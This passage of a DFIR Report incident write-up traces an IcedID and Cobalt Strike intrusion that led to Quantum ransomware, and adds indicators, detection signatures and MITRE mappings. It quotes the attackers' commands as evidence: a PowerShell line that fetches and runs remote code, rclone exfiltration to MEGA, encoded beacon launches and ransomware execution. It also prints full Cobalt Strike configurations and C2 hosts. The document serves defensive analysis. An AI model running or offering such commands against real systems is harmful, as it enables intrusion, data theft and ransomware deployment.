network.\r\nLateral Movement\r\nWMI\r\nThreat actors used wmic.exe in order to execute PowerShell Cobalt Strike beacons on multiple workstations and servers.\r\nThe payloads were stored on textbin[.]net.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 22 of 46\n\nAs we can see above, WmiPrvSe.exe (WMI Provider Host) executed the PowerShell Cobalt Strike beacon on the remote\r\ncomputers.\r\nRemote Desktop Protocol\r\nThe beacon C:\\ProgramData\\lsass.exe was used to proxy RDP connections and connect to another computer.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 23 of 46\n\nProxying RDP traffic via a process such as a Cobalt Strike beacon reduces the exposure of the threat actor’s own\r\ninfrastructure, and blends RDP activity to those of internal hosts on the network.\r\nThe use of RDP was extensively used throughout the intrusion, using a variety of processes (beacon injected or standalone).\r\nThe common processes observed were two injected processes, and the Nigu.exe/lsass.exe.\r\nThese processes are unusual for establishing RDP connections. During these RDP sessions, the threat actors often opened\r\nInternet Explorer to download their beacons or commands they wanted to run on lateral hosts. An example would be pon.txt.\r\nThis file was opened during their RDP session and contained the PowerShell commands used to launch a new beacon:\r\n\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\REDACTED\\Downloads\\pon.txt\r\npon.txt contents:\r\npowershell iex((new-object net.webclient).downloadstring('https://textbin.net/raw/ls1jhefawt'))\r\nRemote Service\r\nRemote services were also created in order to propagate Cobalt Strike beacons in the network.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 24 of 46\n\nAnyDesk\r\nAnyDesk was used to move laterally between a workstation and a backup server as shown below with Sysmon event 3\r\n(Network connection):\r\nCollection\r\nTo achieve collection of various directories on multiple hosts, the threat actors used the dir command through the\r\nadministrative share c$ and redirected the output to a file text named listing.txt.\r\nC:\\Windows\\System32\\cmd.exe /C dir \\\\[REDACTED HOST]\\c$\\users \u003e\u003e listing.txt\r\nIn addition, multiple text files were also created to store the output of various discovery commands and scripts.\r\nC:\\ProgramData\\qwe3.txt\r\nC:\\Users\\[REDACTED USER]\\Downloads\\sns.txt\r\nC:\\Windows\\Temp\\events_Administrator.text\r\nC:\\Windows\\Temp\\events_[REDACTED USER].text\r\nC:\\Windows\\Temp\\listing.txt\r\nC:\\Windows\\Temp\\ns.txt\r\nC:\\Windows\\Temp\\nsserv.txt\r\nCommand and Control\r\nIcedID\r\nThe malware configuration:\r\nConfiguration details:\r\n{“Campaign ID”: 2220668032 ,“C2 url”: “alockajilly.com”}\r\nInitially the IcedID malware made a connection to 64.227.12[.]180:80 for it’s first call back. This aligns with the domain\r\npresent in the malware configuration details.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 25 of 46\n\nAfter the first call over an unencrypted port, command and control traffic moved over to TLS on port 443. Connections were\r\nmade to various IP’s over the length of the intrusion, but two made up the majority of the traffic.\r\ndestination.ip destination.port tls.client.ja3 tls.server.ja3s zeek.ssl.server.nam\r\n5.196.103.145 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc choifejuce[.]lol\r\n5.196.103.145 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc erinindiaka[.]ques\r\n46.101.19.119 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc opiransiuera[.]com\r\n178.128.85.30 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc zoomersoidfor[.]c\r\n5.252.177.10 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc considerf[.]info\r\n66.63.188.70 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc antiflamez[.]bar\r\n155.138.159.45 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc www[.]onlineclou\r\nIcedID C2 beaconing over the intrusion:\r\nCobalt Strike\r\nThere were a number of beacons deployed across the environment, over 70 pipes were created. The beacons used\r\nrecognizable default Cobalt Strike configurations and attempted to masquerade dropped files as legitimate Microsoft\r\nWindows executables. For example, on one host, we could observe over 20 pipes being created, in a pattern of postex_xxxx\r\nor MSSE-xxxx-server.\r\nWhen beacons were deployed within the environment, there was a significant increase in outbound network connections to\r\nC2 servers. For example, a beacon injected into a single Rundll32.exe process generated over 10K connections in a three\r\nhour window, consistently across two days.\r\nThe threat actors deployed various beacons over the course of the intrusion using different methods including executables,\r\nDLLs, and PowerShell beacons.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 26 of 46\n\nOver the length of the intrusion four different Cobalt Strike servers were observed in use. Some lasted the majority of the\r\nintrusion while others only lasted a few days.\r\nCobalt Strike SSL characteristics:\r\ndestination.ip destination.port tls.client.ja3 tls.client.ja3s zeek.ssl.server.na\r\n172.93.181.165 443 a0e9f5d64349fb13191bc781f81f42e1 ae4edc6faf64d08308082ad26be60767 fazehotafa[.]com\r\n45.66.151.109 443 a0e9f5d64349fb13191bc781f81f42e1 ae4edc6faf64d08308082ad26be60767 guteyutur[.]com\r\n111.90.143.191 443 72a589da586844d7f0818ce684948eea ae4edc6faf64d08308082ad26be60767 –\r\n78.128.112.139 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7 –\r\nAnalysis of the Nigu.exe binary indicated use of compression and PE loading characteristics, typically observed for Cobalt\r\nStrike payload beacon. Using CAPA, the results listed the following capabilities:\r\nEmbedded within the binary were strings such as: “inflate 1.2.11 Copyright 1995-2017 Mark Adler”. Once the file was\r\nunpacked and the Cobalt Strike beacon binary carved, the Cobalt Strike configuration could be determined as follows:\r\n{\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"sleeptime\": 5000,\r\n \"jitter\": 28,\r\n \"maxgetsize\": 1865903,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 0,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"fazehotafa.com\",\r\n \"port\": 443,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1nAS8+PqMnQs3hynG2JDgMQK6ZqLkIoDXWnqaOS/dQsdKBHE0Ify/\r\n },\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 27 of 46\n\n\"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/ak.css\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"prepend 1767 characters\",\r\n \"base64\",\r\n \"base64url\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/profile\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"VirtualAllocEx\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 9369,\r\n \"startrwx\": false,\r\n \"stub\": \"Ms1B7fCBDFtfSY7fRzHMbQ==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 28 of 46\n\n\"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nConfigurations for other Cobalt Strike servers observed:\r\n{\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"sleeptime\": 60000,\r\n \"jitter\": 0,\r\n \"maxgetsize\": 1048576,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 0,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"111.90.143.191\",\r\n \"port\": 443,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJh\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/j.ad\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/submit.php\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 29 of 46\n\n\"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"VirtualAllocEx\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 0,\r\n \"startrwx\": true,\r\n \"stub\": \"Ms1B7fCBDFtfSY7fRzHMbQ==\",\r\n \"transform-x86\": null,\r\n \"transform-x64\": null,\r\n \"userwx\": true\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": false\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\n{\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"sleeptime\": 60000,\r\n \"jitter\": 0,\r\n \"maxgetsize\": 1048576,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 305419776,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"78.128.112.139\",\r\n \"port\": 443,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJh\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/ga.js\",\r\n \"verb\": \"GET\",\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 30 of 46\n\n\"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/submit.php\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"VirtualAllocEx\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 0,\r\n \"startrwx\": true,\r\n \"stub\": \"tUr+Aexqde3zXhpE+L05KQ==\",\r\n \"transform-x86\": null,\r\n \"transform-x64\": null,\r\n \"userwx\": true\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": false\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 31 of 46\n\n\"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nRemote Access Software\r\nAs shown above, three different Remote Access Software were used by the threat actor:\r\nAtera\r\nSplashtop\r\nAnyDesk\r\nIt is unclear why the threat actor used three different tools in order to establish an interactive and persistent command and\r\ncontrol channel.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 32 of 46\n\nThe AnyDesk service password was set manually using the command line as shown below:\r\npowershell -np -w hidden -encodedcommand JABzAD0ATgBlAHcAL [.....] --\u003e CS beacon\r\n --\u003e \"c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" -Version 5.1 -s -NoLogo -NoProfile\r\n --\u003e C:\\Windows\\system32\\cmd.exe /C cmd.exe /c echo Qwerty123!@#_! | C:\\ProgramData\\anydesk.exe --set-pass\r\nThe software packages were bundled within a single Microsoft Software Installer (MSI) package, named hp.msi. This was\r\ninstalled from the ProgramData folder, resulting in the installation of the remote management tools. The activity can be\r\ncorrelated against the Application log for MSI installer events (Event ID 1033).\r\nExfiltration\r\nDuring the intrusion, the threat actors were observed accessing collected data such as ShareFinder.txt using Notepad and\r\nthen copying the contents to the clipboard.\r\nWhilst the process activity indicated Active Directory accounts being used, correlating this activity to Clipboard activity\r\nindicated matching sessions, process IDs, and the true source of the user.\r\nIn this case, ShareFinder.txt was created in the ProgramData folder by the ShareFinder.ps1 script. Approximately 2 seconds\r\nlater, the threat actors accessed this file and copied the contents.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 33 of 46\n\nWhile the threat actors made attempts to proxy RDP traffic and minimize external RDP access, the threat actors’ workstation\r\nwas revealed in several Windows logs. Sysmon Event ID 24 linked the threat actors host name HYPERV and the IPv4\r\naddress of 199.101.184[.]230. This host name was also in the Security events:\r\nFor example, Event 4779 relating to a user disconnecting from a terminal session, reveals the client name of the source\r\nworkstation. The client address was the internal workstation where the RDP traffic was being proxied through.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 34 of 46\n\nExfiltrated Documents Opened Remotely\r\nDuring the second day of the intrusion, documents from the organization were opened remotely from 212.102.59[.]162 and\r\n165.231.182[.]14. This occurred before Rclone was used, which leads us to believe the documents were exfiltrated over one\r\nof the encrypted C2 channels.\r\nRclone\r\nOn the backup server, rclone.exe was used in order to exfiltrate data to a MEGA cloud storage.\r\nrclone.exe copy --max-age 5y \"\\\\[REDACTED BACKUP]\\E:\\[REDACTED]\\\" remote:Groups --exclude \"*.{psd,7z,dwg,rar\r\nFrom the rclone.exe configuration file, we can retrieve the user’s mail address and password.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 35 of 46\n\nMega user account:\r\ngoodvibe888@proton.me\r\nImpact\r\nAlert\r\nInterestingly, the operator issued a command that displayed an alert informing the end user of a compromise, specifically\r\nwith Cobalt Strike. Its unclear why the operator chose to do this, as this was around three hours prior to the ransomware\r\nbeing executed or a ransom note being dropped.\r\nThe alert message that was visible:\r\nThe activity can be observed in the PowerShell WinEvent logs:\r\nRansomware\r\nThe threat actors dropped the first of their ransomware binaries on the fourth day of the intrusion. Around 40 minutes after\r\ncreating the alert messages for Cobalt Strike to show up, they dropped locker_64.exe on the backup server. They created a\r\nfile (2.txt) and populated it with a list of hosts they had uncovered during their discovery activity. The locker_64.exe file was\r\nthen renamed to 64.exe and executed using the text file in the command arguments:\r\n64.exe /target=@2.txt\r\nThe threat actors attempted to execute the malware across all hosts in the target list, but only execution on the backup server\r\nwas observed.\r\nThe threat actor then tried again on a different server using a DLL this time:\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 36 of 46\n\nrundll32 locker_32.dll,run /target=@2.txt\r\nAgain, only execution on the server was observed. They then executed a new Cobalt Strike PowerShell beacon on a 3rd\r\nserver and executed the ramsomware using that.\r\n\"c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" -Version 5.1 -s -NoLogo -NoProfile\r\n ➝ C:\\Windows\\system32\\cmd.exe /C locker_64.exe\r\nThey then opened an RDP connection back to the primary domain controller and proceeded to try to execute the binary with\r\na target list again. After only affecting the single host, the threat actors dropped several batch scripts on the server:\r\npass.bat\r\n1.bat\r\n2.bat\r\nThe script pass.bat proceeded to reset all the user accounts in the domain to a single password set by the threat actors.\r\nThere were thousands of Windows Security Event ID 4724 events generated within a two minute period.\r\nThis password reset would enable the next scripts to function as intended while also hampering any recovery activity.\r\nThe 1.bat file then proceeded to copy the ransomware binary across to hosts in the environment.\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 37 of 46\n\nFinally 2.bat used the reset password to enable psexec to execute the ransomware on all the remote hosts.\r\nWhen the payload was executed, there were some telltale registry events observed indicating .Quantum file extension Shell\r\nOpen Command artifacts.\r\nThe HTML message was dropped in various directories across the endpoints:\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 38 of 46\n\nThe HTML file displayed the all but familiar message:\r\nThe following Locker files were then deleted:\r\nDiamond Model\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 39 of 46\n\nTimeline\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 40 of 46\n\nIndicators\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 41 of 46\n\nAtomic\r\nIcedID:\r\nalockajilly.com\r\nzoomersoidfor.com\r\nchoifejuce.lol\r\nopiransiuera.com\r\nerinindiaka.quest\r\nopiransiuera.com\r\nzoomersoidfor.com\r\nconsiderf.info\r\nantiflamez.bar\r\nwww.onlinecloud.cloud\r\n64.227.12.180:80\r\n5.196.103.145:443\r\n66.63.188.70:443\r\n178.128.85.30:443\r\n5.252.177.10:443\r\n46.101.19.119:443\r\nCobalt Strike:\r\nfazehotafa.com\r\nguteyutu.com\r\n45.66.151.109\r\n172.93.181.165\r\n111.90.143.191\r\n78.128.112.139\r\nMega User:\r\ngoodvibe888@proton[.]me\r\nAttacker Infrastructure:\r\n199.127.60[.]117\r\n199.101.184[.]230\r\nComputed\r\nInvoice-09-28#268_PDF.iso\r\n515047b6ce410001696812bc85e197d1\r\n26b11c95a6a324dbb0ab32428361b0531234ecee\r\n68f971a1b391f809058e83058a2037d29c28a8a21fd618b0d952466c632ff1be\r\ndocuments.lnk\r\n1af7a0e058ce1b63b138a1425a835561\r\n66b8da857c6dc45dea3a9fb17a503b3c2d203245\r\n1ee563caf943d3a7ed315dda9c37f0c9c445eec6dfb78ae196d2989626a0dfec\r\neyewear.bat\r\n0d51c60c67c62836ba0f7948113b3737\r\na597205ed55b6e6413a17edb62cbb29bda735676\r\n999cba918c297bf0b0d7d4aa9003e6338cc300a9270cc758d1d108c26603417d\r\neasygoing.dat\r\nf102a95e749d1ee63c71df902856ae51\r\nfda81b5951bb02ef0236088c310d9bc4fa70e1e6\r\nf27d924911a7087928012764358bad9240b2ba8aeeca5e0d717abdbb82344981\r\nrapuab1.dll\r\nce1b0e77a31da8dc68f77a977b04f3e4\r\n5facd0aa9a29e0768ab9f432c79eac173af69711\r\n163800b0fbf1b1b7bbc7f719df421ed717111c7c9ddea9c9b41f898ee22dd51a\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 42 of 46\n\n9bd6b1f24b9589a3fbc1d54b6e6184b8\r\nf8473c6c8b298a3d72c8ca890667eddab62d2ba8\r\n03a9d6afc99e70333723d921bd1265ac948cdabb8b15689b5ceb1c02365a9572\r\nbeacA.dll\r\n1b1497c2758ff5a8ade2df336a7a6c2d\r\nd6cc874f84797813c225318b877eace04ca5f5a1\r\n47ed0d1c7d8abc159d1eb2bb9fbe037f38b0846217cc11132652734f93ad5678\r\nbeaconM-1664297797-T0B9Z_32-cr.exe\r\ndbb08886c60f3c44b377d09bd9d8b6d3\r\n7262b7df4d90409fb141856d9b55792872deda20\r\n8f7cc7cc14a12753d41678981b929546d12218d457a9d22951808cb5f19e549c\r\ndf5ce1159ef2e257df92e1825d786d87\r\na7e163eaa0fc2afb9c0d5ac6f79cb3e49919dd3c\r\n842737b5c36f624c9420a005239b04876990a2c4011db87fe67504fa09281031\r\nAD.bat\r\ne77f23aac8db0d23196b6bef64fe04fc\r\n90bf77e194970dd74d1b49faf58ae395ce49bb34\r\nc2ebcc389304539bc13c3d2023cf88f9ea0bac7210fefa03f8333eaab0bbb76d\r\nns.bat\r\n7ac356035fce31e9e14c3a3d371ddf41\r\n61f838d9b0998ab23877e86f6e8ba3551799e07c\r\n4f52c7448bdcb4caa2eff701b0f3b60b406aea278ecd5a3b23cac808a65418e7\r\n92edbbeff775928cfc6e3c8efefe4ecc\r\nfffa0ce086791c41360971e3ce6a0d1af1701616\r\nfc4da07183de876a2b8ed1b35ec1e2657400da9d99a313452162399c519dbfc6\r\n955d0cf317efe48bf0394330fcd82ebb\r\nd84d40038311e188e25c78389b51b900de9c69bd\r\ne9da08831e0d4395f697e4f18c87be941bf52c79d84da1cc88186bdea1ebf4f4\r\nlsass.dll\r\nadc50d0c1e7bf37288a612a0f278e028\r\n6254e8cca47d87f29e85627a08ba88b79915a459\r\nfafc84466c1ce361bb6ce219bde2b64ca07a6a6feda23f444749ba06c44b0580\r\n397020072f5787dbbc0c344f98623bbd\r\n970e793c86266b20d280c04e0f41ec7ae9c2093c\r\n6511d6e84343c2d3a4cd36853170509e2751e27c86f67c6a031dc88e7e495e48\r\n601d613bff412d245e3edf46dc499d83\r\na39b9119003c63583e2a0f11f19f3e6050399176\r\n2a2c83a7c8cd33e45dc14b8d955e00161580d6d2736f4e75a235aa3eb2f21528\r\nlocker_32.dll\r\n131d277cfbc9f4b2d667150d84ad503d\r\nf05ff93ee4d2f31bc70c0484a559d562203b7700\r\na378b8e9173f4a5469e7b5105be40723af29cbd6ee00d3b13ff437dae4514dff\r\nlicense.dat\r\nb31de50a57e8cb73c9efda8b97ffa261\r\na7e3f617644599ec695da84d140a7b69c392a421\r\n55be890947d021fcc8c29af3c7aaf70d8132f222e944719c43a6e819e84a8f8b\r\nDetections\r\nNetwork\r\nET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike\r\nET Threatview.io High Confidence Cobalt Strike C2 IP group 2\r\nET INFO Pastebin-style Service (textbin .net in TLS SNI)\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 43 of 46\n\nET INFO Splashtop Domain (splashtop .com) in TLS SNI\r\nET INFO Splashtop Domain in DNS Lookup (splashtop .com)\r\nET MALWARE Meterpreter or Other Reverse Shell SSL Cert\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET INFO Dotted Quad Host DLL Request\r\nET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download\r\nET HUNTING SUSPICIOUS Dotted Quad Host MZ Response\r\nET HUNTING Suspicious lsass.exe in URI\r\nET MALWARE Win32/IcedID Request Cookie\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\nET EXPLOIT Possible Zerologon Phase 1/3 - NetrServerReqChallenge with 0x00 Client Challenge (CVE-2020-1472)\r\nET EXPLOIT Zerologon Phase 2/3 - NetrServerAuthenticate2 Request with 0x00 Client Challenge and Sign and Seal\r\nET EXPLOIT Zerologon Phase 3/3 - Malicious NetrServerPasswordSet2 (CVE-2020-1472)\r\nSigma\r\nYara\r\nwin_cobalt_strike_auto\r\nCobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/18041/18041.yar\r\nMITRE\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 44 of 46\n\nSpearphishing Attachment - T1566.001\r\nWindows Management Instrumentation - T1047\r\nWindows Command Shell - T1059.003\r\nMalicious File - T1204.002\r\nPowerShell - T1086\r\nService Execution - T1035\r\nScheduled Task - T1053.005\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 45 of 46\n\nExploitation for Privilege Escalation - T1068\r\nAccess Token Manipulation - T1134\r\nRegsvr32 - T1218.010\r\nRundll32 - T1218.011\r\nDCSync - T1003.006\r\nLSASS Memory - T1003.001\r\nDomain Trust Discovery - T1482\r\nSystem Information Discovery - T1082\r\nRemote System Discovery - T1018\r\nGroup Policy Discovery - T1615\r\nSystem Language Discovery - T1614.001\r\nSystem Time Discovery - T1124\r\nNetwork Share Discovery - T1135\r\nDomain Account - T1087.002\r\nFile and Directory Discovery - T1083\r\nRemote Desktop Protocol - T1021.001\r\nSMB/Windows Admin Shares - T1021.002\r\nLateral Tool Transfer - T1570\r\nWindows Remote Management - T1021.006\r\nLocal Data Staging - T1074.001\r\nWeb Protocols - T1071.001\r\nExfiltration to Cloud Storage - T1567.002\r\nData Encrypted for Impact - T1486\r\nAccount Access Removal - T1531\r\nDisable or Modify Tools - T1562.001\r\nMark-of-the-Web Bypass - T1553.005\r\nSystem Owner/User Discovery - T1033\r\nS0002 - Mimikatz\r\nS0154 - Cobalt Strike\r\nS0359 - Nltest\r\nS0039 - Net\r\nS0096 - Systeminfo\r\nS0100 - IPconfig\r\nS0552 - AdFind\r\nInternal case #18041\r\nSource: https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 46 of 46",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
